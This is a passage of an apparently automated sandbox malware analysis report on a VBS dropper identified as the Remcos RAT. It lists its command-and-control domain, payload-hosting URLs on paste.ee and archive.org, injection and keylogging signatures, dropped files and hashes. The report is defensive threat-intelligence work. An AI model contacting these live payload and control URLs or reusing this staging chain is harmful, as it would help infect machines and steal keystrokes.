INTERNET-ARCHIVEUS United States 15->38 40 Writes to foreign memory regions 15->40 42 Injects a PE file into a foreign processes 15->42 21 AddInProcess32.exe 3 2 15->21         started        signatures10 process11 dnsIp12 34 23spt.duckdns.org 192.169.69.26, 3000, 49707, 49714 WOWUS United States 21->34 26 C:\ProgramData\remcos\logs.dat, data 21->26 dropped 56 Detected Remcos RAT 21->56 58 Installs a global keyboard hook 21->58 file13 signatures14

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  OIQ1ybtQdW.vbs11%ReversingLabsScript-WScript.Backdoor.Remcos
                  OIQ1ybtQdW.vbs6%VirustotalBrowse

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  SourceDetectionScannerLabelLink
                  ia600100.us.archive.org0%VirustotalBrowse
                  23spt.duckdns.org15%VirustotalBrowse
                  paste.ee1%VirustotalBrowse

                  URLs

                  SourceDetectionScannerLabelLink
                  http://nuget.org/NuGet.exe0%URL Reputationsafe
                  http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                  http://crl.microsoft0%URL Reputationsafe
                  https://go.micro0%URL Reputationsafe
                  https://contoso.com/License0%URL Reputationsafe
                  https://contoso.com/Icon0%URL Reputationsafe
                  https://aka.ms/pscore60%URL Reputationsafe
                  http://geoplugin.net/json.gp/C0%URL Reputationsafe
                  https://contoso.com/0%URL Reputationsafe
                  https://nuget.org/nuget.exe0%URL Reputationsafe
                  https://oneget.orgX0%URL Reputationsafe
                  https://aka.ms/pscore680%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  https://oneget.org0%URL Reputationsafe
                  http://paste.ee1%VirustotalBrowse
                  https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtVw3;w1Zbase64Content2%VirustotalBrowse
                  http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
                  23spt.duckdns.org15%VirustotalBrowse
                  https://github.com/Pester/Pester1%VirustotalBrowse
                  http://www.apache.org/licenses/LICENSE-2.00%VirustotalBrowse
                  https://analytics.paste.ee1%VirustotalBrowse
                  https://paste.ee1%VirustotalBrowse
                  https://ia600100.us.archive.org/1%VirustotalBrowse
                  https://ia600100.us.archive.org1%VirustotalBrowse
                  https://cdnjs.cloudflare.com0%VirustotalBrowse
                  https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt10%VirustotalBrowse
                  https://www.google.com0%VirustotalBrowse
                  https://paste.ee/d/nJcWp/03%VirustotalBrowse
                  https://secure.gravatar.com0%VirustotalBrowse
                  http://ia600100.us.archive.org0%VirustotalBrowse
                  https://themes.googleusercontent.com0%VirustotalBrowse

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  ia600100.us.archive.org
                  		207.241.227.240
                  		truefalseunknown
                  23spt.duckdns.org
                  		192.169.69.26
                  		truetrueunknown
                  paste.ee
                  		188.114.96.3
                  		truetrueunknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  23spt.duckdns.orgtrueunknown
                  https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtfalseunknown
                  https://paste.ee/d/nJcWp/0trueunknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://schemas.dmtwscript.exe, 00000000.00000003.1264393743.000001D788743000.00000004.00000020.00020000.00000000.sdmpfalse
                    		unknown
                    http://nuget.org/NuGet.exepowershell.exe, 00000006.00000002.1378588214.00000208E4E50000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1392660414.00000208F34A3000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000006.00000002.1378588214.00000208E4B85000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                    https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtVw3;w1Zbase64Contentpowershell.exe, 00000006.00000002.1378588214.00000208E3652000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.1378588214.00000208E4CD8000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://paste.eepowershell.exe, 00000006.00000002.1378588214.00000208E3A3F000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                    http://crl.microsoftpowershell.exe, 00000002.00000002.1427139598.000001C4654D5000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.1378588214.00000208E4CD8000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                    https://go.micropowershell.exe, 00000006.00000002.1378588214.00000208E46AC000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://contoso.com/Licensepowershell.exe, 00000006.00000002.1392660414.00000208F34A3000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.google.com;powershell.exe, 00000006.00000002.1378588214.00000208E3A3F000.00000004.00000800.00020000.00000000.sdmpfalse
                      		unknown
                      https://contoso.com/Iconpowershell.exe, 00000006.00000002.1392660414.00000208F34A3000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://ia600100.us.arXpowershell.exe, 00000006.00000002.1378588214.00000208E4B33000.00000004.00000800.00020000.00000000.sdmpfalse
                        		unknown
                        https://analytics.paste.eepowershell.exe, 00000006.00000002.1378588214.00000208E3A3F000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                        https://paste.eepowershell.exe, 00000006.00000002.1378588214.00000208E3863000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                        https://aka.ms/pscore6powershell.exe, 00000002.00000002.1429078475.000001C467332000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.1378588214.00000208E4CD8000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                        https://www.google.compowershell.exe, 00000006.00000002.1378588214.00000208E3A3F000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                        https://ia600100.us.archive.org/powershell.exe, 00000006.00000002.1414917248.00000208FB430000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                        http://geoplugin.net/json.gp/Cpowershell.exe, 00000006.00000002.1392660414.00000208F44E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1392660414.00000208F34A3000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000B.00000002.2544026663.0000000000458000.00000040.00000400.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://contoso.com/powershell.exe, 00000006.00000002.1392660414.00000208F34A3000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://nuget.org/nuget.exepowershell.exe, 00000006.00000002.1378588214.00000208E4E50000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1392660414.00000208F34A3000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://oneget.orgXpowershell.exe, 00000006.00000002.1378588214.00000208E4B85000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://analytics.paste.ee;powershell.exe, 00000006.00000002.1378588214.00000208E3A3F000.00000004.00000800.00020000.00000000.sdmpfalse
                          		unknown
                          https://ia600100.us.archive.orgpowershell.exe, 00000006.00000002.1378588214.00000208E46AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1378588214.00000208E3652000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                          https://cdnjs.cloudflare.compowershell.exe, 00000006.00000002.1378588214.00000208E3A3F000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                          https://aka.ms/pscore68powershell.exe, 00000002.00000002.1429078475.000001C46734B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1378588214.00000208E3431000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://cdnjs.cloudflare.com;powershell.exe, 00000006.00000002.1378588214.00000208E3A3F000.00000004.00000800.00020000.00000000.sdmpfalse
                            		unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1429078475.000001C4672E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1378588214.00000208E3431000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://crl.vpowershell.exe, 00000002.00000002.1427370499.000001C4671C5000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              https://secure.gravatar.compowershell.exe, 00000006.00000002.1378588214.00000208E3A3F000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                              https://themes.googleusercontent.compowershell.exe, 00000006.00000002.1378588214.00000208E3A3F000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                              https://oneget.orgpowershell.exe, 00000006.00000002.1378588214.00000208E4B85000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://ia600100.us.archive.orgpowershell.exe, 00000006.00000002.1378588214.00000208E4B38000.00000004.00000800.00020000.00000000.sdmpfalseunknown

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              188.114.96.3
                              		paste.eeEuropean Union
                              		13335CLOUDFLARENETUStrue
                              192.169.69.26
                              		23spt.duckdns.orgUnited States
                              		23033WOWUStrue
                              207.241.227.240
                              		ia600100.us.archive.orgUnited States
                              		7941INTERNET-ARCHIVEUSfalse

                              General Information

                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1523833
                              Start date and time:2024-10-02 05:28:47 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 5m 39s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:16
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:OIQ1ybtQdW.vbs
                              renamed because original name is a hash value
                              Original Sample Name:8140d8019e144b3998a9fc991c45be89eb5f83c58f04627ce34c49b3f8d5d368.vbs
                              Detection:MAL
                              Classification:mal100.troj.spyw.expl.evad.winVBS@8/6@4/3
                              EGA Information:Failed
                              HCA Information:Failed
                              Cookbook Comments:
                              • Found application associated with file extension: .vbs

                              Warnings

                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Execution Graph export aborted for target AddInProcess32.exe, PID 8028 because there are no executed function
                              • Execution Graph export aborted for target powershell.exe, PID 7360 because it is empty
                              • Execution Graph export aborted for target powershell.exe, PID 7540 because it is empty
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              23:29:39API Interceptor43x Sleep call for process: powershell.exe modified
                              23:30:21API Interceptor1937637x Sleep call for process: AddInProcess32.exe modified

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              188.114.96.3hbwebdownload - MT 103.exeGet hashmaliciousFormBookBrowse
                              • www.j88.travel/c24t/?Edg8Tp=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+lW3g3vOrk23&iL30=-ZRd9JBXfLe8q2J
                              z4Shipping_document_pdf.exeGet hashmaliciousFormBookBrowse
                              • www.bayarcepat19.click/g48c/
                              update SOA.exeGet hashmaliciousFormBookBrowse
                              • www.bayarcepat19.click/5hcm/
                              docs.exeGet hashmaliciousFormBookBrowse
                              • www.j88.travel/c24t/?I6=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+la3znjNy02hfQbCEg==&AL0=9rN46F
                              https://wwvmicrosx.live/office365/office_cookies/mainGet hashmaliciousHTMLPhisherBrowse
                              • wwvmicrosx.live/office365/office_cookies/main/
                              http://fitur-dana-terbaru-2024.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                              • fitur-dana-terbaru-2024.pages.dev/favicon.ico
                              http://mobilelegendsmycode.com/Get hashmaliciousUnknownBrowse
                              • mobilelegendsmycode.com/favicon.ico
                              http://instructionhub.net/?gad_source=2&gclid=EAIaIQobChMI-pqSm7HgiAMVbfB5BB3YEjS_EAAYASAAEgJAAPD_BwEGet hashmaliciousWinSearchAbuseBrowse
                              • download.all-instructions.com/Downloads/Instruction%2021921.pdf.lnk
                              ADNOC requesting RFQ.exeGet hashmaliciousFormBookBrowse
                              • www.chinaen.org/zi4g/
                              http://twint.ch-daten.com/de/receive/bank/sgkb/79469380Get hashmaliciousUnknownBrowse
                              • twint.ch-daten.com/socket.io/?EIO=4&transport=polling&t=P8hxwsc
                              192.169.69.26SX8OLQP63C.exeGet hashmaliciousVjW0rm, AsyncRAT, RATDispenserBrowse
                              • yuya0415.duckdns.org:1928/Vre
                              confirmaci#U00f3n y correcci#U00f3n de la direcci#U00f3n de entrega.vbsGet hashmaliciousUnknownBrowse
                              • servidorarquivos.duckdns.org/e/e
                              oKtkBYZMWl.exeGet hashmaliciousUnknownBrowse
                              • csacsadhe.duckdns.org/byfronbypass.html/css/mss/Arzgohi.mp3
                              oKtkBYZMWl.exeGet hashmaliciousUnknownBrowse
                              • csacsadhe.duckdns.org/byfronbypass.html/css/mss/Arzgohi.mp3
                              http://yvtplhuqem.duckdns.org/ja/Get hashmaliciousUnknownBrowse
                              • yvtplhuqem.duckdns.org/ja/
                              http://fqqqffcydg.duckdns.org/en/Get hashmaliciousUnknownBrowse
                              • fqqqffcydg.duckdns.org/en/
                              http://yugdzvsqnf.duckdns.org/en/Get hashmaliciousUnknownBrowse
                              • yugdzvsqnf.duckdns.org/en/
                              &nuevo_pedido#..vbsGet hashmaliciousUnknownBrowse
                              • servidorarquivos.duckdns.org/e/e
                              transferencia_Hsbc.xlsxGet hashmaliciousUnknownBrowse
                              • servidorarquivos.duckdns.org/e/e
                              http://www.secure-0fflce-o365.duckdns.org/Get hashmaliciousUnknownBrowse
                              • www.secure-0fflce-o365.duckdns.org/

                              Domains

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              paste.ee1iH5ABLKIA.vbsGet hashmaliciousAsyncRAT, DcRat, PureLog StealerBrowse
                              • 188.114.96.3
                              vr65co3Boo.vbsGet hashmaliciousAsyncRAT, DcRat, PureLog StealerBrowse
                              • 188.114.97.3
                              qiEmGNhUij.vbsGet hashmaliciousAsyncRAT, DcRat, PureLog StealerBrowse
                              • 188.114.96.3
                              asegurar.vbsGet hashmaliciousRemcosBrowse
                              • 188.114.97.3
                              dcsegura.vbsGet hashmaliciousAsyncRAT, DcRatBrowse
                              • 188.114.97.3
                              asegura.vbsGet hashmaliciousRemcosBrowse
                              • 188.114.97.3
                              RFQ-5120240930 VENETA PESCA SRL.vbsGet hashmaliciousVIP KeyloggerBrowse
                              • 188.114.97.3
                              sostener.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                              • 188.114.97.3
                              asegurar.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                              • 188.114.97.3
                              hnvc.vbsGet hashmaliciousPureLog StealerBrowse
                              • 188.114.97.3
                              23spt.duckdns.org17273431863ab7a79d0c4618c39383a44188eff7849fa1201010774aef83d8c896a4db4eb8287.dat-decoded.exeGet hashmaliciousRemcosBrowse
                              • 181.236.206.3
                              asegurar.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                              • 181.236.206.3
                              ia600100.us.archive.org1iH5ABLKIA.vbsGet hashmaliciousAsyncRAT, DcRat, PureLog StealerBrowse
                              • 207.241.227.240
                              aK7smea2Vv.vbsGet hashmaliciousPureLog StealerBrowse
                              • 207.241.227.240
                              vr65co3Boo.vbsGet hashmaliciousAsyncRAT, DcRat, PureLog StealerBrowse
                              • 207.241.227.240
                              f4576JaIo9.vbsGet hashmaliciousPureLog StealerBrowse
                              • 207.241.227.240
                              89SkYNNpdi.vbsGet hashmaliciousAveMaria, PrivateLoader, PureLog StealerBrowse
                              • 207.241.227.240
                              qiEmGNhUij.vbsGet hashmaliciousAsyncRAT, DcRat, PureLog StealerBrowse
                              • 207.241.227.240
                              ZJbugHcHda.vbsGet hashmaliciousPureLog StealerBrowse
                              • 207.241.227.240
                              0BO4n723Q8.vbsGet hashmaliciousPureLog StealerBrowse
                              • 207.241.227.240
                              PofaABvatI.vbsGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              • 207.241.227.240
                              SecuriteInfo.com.Exploit.CVE-2017-11882.123.29427.26024.rtfGet hashmaliciousPureLog StealerBrowse
                              • 207.241.227.240

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              INTERNET-ARCHIVEUSkz1fEn2R9Z.vbsGet hashmaliciousPureLog StealerBrowse
                              • 207.241.227.240
                              1iH5ABLKIA.vbsGet hashmaliciousAsyncRAT, DcRat, PureLog StealerBrowse
                              • 207.241.227.240
                              aK7smea2Vv.vbsGet hashmaliciousPureLog StealerBrowse
                              • 207.241.227.240
                              vr65co3Boo.vbsGet hashmaliciousAsyncRAT, DcRat, PureLog StealerBrowse
                              • 207.241.227.240
                              f4576JaIo9.vbsGet hashmaliciousPureLog StealerBrowse
                              • 207.241.227.240
                              89SkYNNpdi.vbsGet hashmaliciousAveMaria, PrivateLoader, PureLog StealerBrowse
                              • 207.241.227.240
                              qiEmGNhUij.vbsGet hashmaliciousAsyncRAT, DcRat, PureLog StealerBrowse
                              • 207.241.227.240
                              ZJbugHcHda.vbsGet hashmaliciousPureLog StealerBrowse
                              • 207.241.227.240
                              0BO4n723Q8.vbsGet hashmaliciousPureLog StealerBrowse
                              • 207.241.227.240
                              PofaABvatI.vbsGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              • 207.241.227.240
                              CLOUDFLARENETUS1iH5ABLKIA.vbsGet hashmaliciousAsyncRAT, DcRat, PureLog StealerBrowse
                              • 188.114.96.3
                              vr65co3Boo.vbsGet hashmaliciousAsyncRAT, DcRat, PureLog StealerBrowse
                              • 188.114.97.3
                              89SkYNNpdi.vbsGet hashmaliciousAveMaria, PrivateLoader, PureLog StealerBrowse
                              • 162.159.140.237
                              file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                              • 172.67.184.196
                              qiEmGNhUij.vbsGet hashmaliciousAsyncRAT, DcRat, PureLog StealerBrowse
                              • 188.114.96.3
                              PofaABvatI.vbsGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              • 162.159.140.237
                              mitec_purchase_order_PDF (1).vbsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                              • 172.66.0.235
                              http://lamourskinclinic.com.auGet hashmaliciousUnknownBrowse
                              • 104.18.10.207
                              https://unpaidrefund.top/view/mygovGet hashmaliciousHTMLPhisherBrowse
                              • 188.114.96.3
                              payment copy.exeGet hashmaliciousFormBookBrowse
                              • 23.227.38.74
                              WOWUSEnclosed_PO4376630092024_Request_Specifications_Drawings_jpg.exeGet hashmaliciousRemcos, GuLoaderBrowse
                              • 192.169.69.26
                              Awb_Shipping_Invoice_docs_001700720242247820020031808174CN18003170072024.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                              • 192.169.69.26
                              https://ipfs.io/ipfs/QmUcxG9XYwfiVnjaf6ugfmt6iPHAdNuk7o3cqDa64AYtKBGet hashmaliciousHTMLPhisherBrowse
                              • 216.176.181.165
                              file.exeGet hashmaliciousRemcos, GuLoaderBrowse
                              • 192.169.69.26
                              New_Order-Rquest_Quotation_Specifications_Drawings_Samplespdf.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                              • 192.169.69.26
                              PO-2609202412666 PNG2023-W101_pdf.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                              • 192.169.69.26
                              Awb_Shipping_Documents_BL_Invoice_Packinglist_0000000000000000000000pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
                              • 192.169.69.26
                              http://pub-d64d63bc9b0049929bfeb3afd89bfb4d.r2.dev/file.htmlGet hashmaliciousHTMLPhisherBrowse
                              • 216.176.181.165
                              decode_d231cea552794f0b5f2ce1752769cb9badfba3e638e66d6006239f661c49b09c.exeGet hashmaliciousRemcosBrowse
                              • 192.169.69.26
                              SX8OLQP63C.exeGet hashmaliciousVjW0rm, AsyncRAT, RATDispenserBrowse
                              • 192.169.69.26

                              JA3 Fingerprints

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              3b5074b1b5d032e5620f69f9f700ff0ekz1fEn2R9Z.vbsGet hashmaliciousPureLog StealerBrowse
                              • 207.241.227.240
                              • 188.114.96.3
                              1iH5ABLKIA.vbsGet hashmaliciousAsyncRAT, DcRat, PureLog StealerBrowse
                              • 207.241.227.240
                              • 188.114.96.3
                              uLfuBVyZFV.vbsGet hashmaliciousUnknownBrowse
                              • 207.241.227.240
                              • 188.114.96.3
                              aK7smea2Vv.vbsGet hashmaliciousPureLog StealerBrowse
                              • 207.241.227.240
                              • 188.114.96.3
                              vr65co3Boo.vbsGet hashmaliciousAsyncRAT, DcRat, PureLog StealerBrowse
                              • 207.241.227.240
                              • 188.114.96.3
                              f4576JaIo9.vbsGet hashmaliciousPureLog StealerBrowse
                              • 207.241.227.240
                              • 188.114.96.3
                              WW8kzvnphl.vbsGet hashmaliciousUnknownBrowse
                              • 207.241.227.240
                              • 188.114.96.3
                              89SkYNNpdi.vbsGet hashmaliciousAveMaria, PrivateLoader, PureLog StealerBrowse
                              • 207.241.227.240
                              • 188.114.96.3
                              qiEmGNhUij.vbsGet hashmaliciousAsyncRAT, DcRat, PureLog StealerBrowse
                              • 207.241.227.240
                              • 188.114.96.3
                              2THp7fwNQD.vbsGet hashmaliciousUnknownBrowse
                              • 207.241.227.240
                              • 188.114.96.3

                              Dropped Files

                              No context

                              Created / dropped Files

                              C:\ProgramData\remcos\logs.dat

                              Download File
                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):144
                              Entropy (8bit):3.365630494294252
                              Encrypted:false
                              SSDEEP:3:rhlKlM+VlUs2ee55JWRal2Jl+7R0DAlBG45klovDl6v:6lJZU5YcIeeDAlOWAv
                              MD5:C221DF9F2E4733D976D1C8C9228B4500
                              SHA1:3A7E55D32D4576B516E3182F86477568DC58AA6D
                              SHA-256:459DF5731155AC01F4BD97A2BFEEB6EF7FF8D7D6704999ACFBEA44043DAE0C87
                              SHA-512:917F6DA17FE97F86AA3597191F2D01B28C853628F027093FF67B18819B020A6DF1F074B61036496F1D7538D751537D27A55B3B050480B148F801D0D575832046
                              Malicious:true
                              Yara Hits:
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                              Reputation:low
                              Preview:....[.2.0.2.4./.1.0./.0.1. .2.3.:.2.9.:.4.9. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):64
                              Entropy (8bit):1.1940658735648508
                              Encrypted:false
                              SSDEEP:3:Nlllulp77th:NllU
                              MD5:7B5F360646F3167812DC4ADF7B166512
                              SHA1:F00A325C611E6C9CC6D2069C0FEAE54C6B7E48E5
                              SHA-256:672CD1B39FD62CBC4EEAC339C7863E190A95CEF4DDCEF0F4A5BE946E098B63B0
                              SHA-512:7CA2CD8F0A6E6388628AC33A539DB661FCFFE08453DFACFE353B18B548ABC08072BF2FDAE40EEEA671137FE137177ADB4E322D9C77CDE8B6AADE7600EA4C18E0
                              Malicious:false
                              Reputation:moderate, very likely benign file
                              Preview:@...e.................................x..............@..........

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_131jske2.2rf.ps1

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Reputation:high, very likely benign file
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b21pzokz.ey2.psm1

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jufgqjkt.stg.psm1

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yd2ofkty.lqr.ps1

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              Static File Info

                              General

                              File type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Entropy (8bit):3.7457350758631964
                              TrID:
                              • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                              • MP3 audio (1001/1) 32.22%
                              • Lumena CEL bitmap (63/63) 2.03%
                              • Corel Photo Paint (41/41) 1.32%
                              File name:OIQ1ybtQdW.vbs
                              File size:511'658 bytes
                              MD5:4a31a1de3d99c80d908ddda051e2f761
                              SHA1:302e19edb2c96cc78cb866c2d78d7f2fc77e8297
                              SHA256:8140d8019e144b3998a9fc991c45be89eb5f83c58f04627ce34c49b3f8d5d368
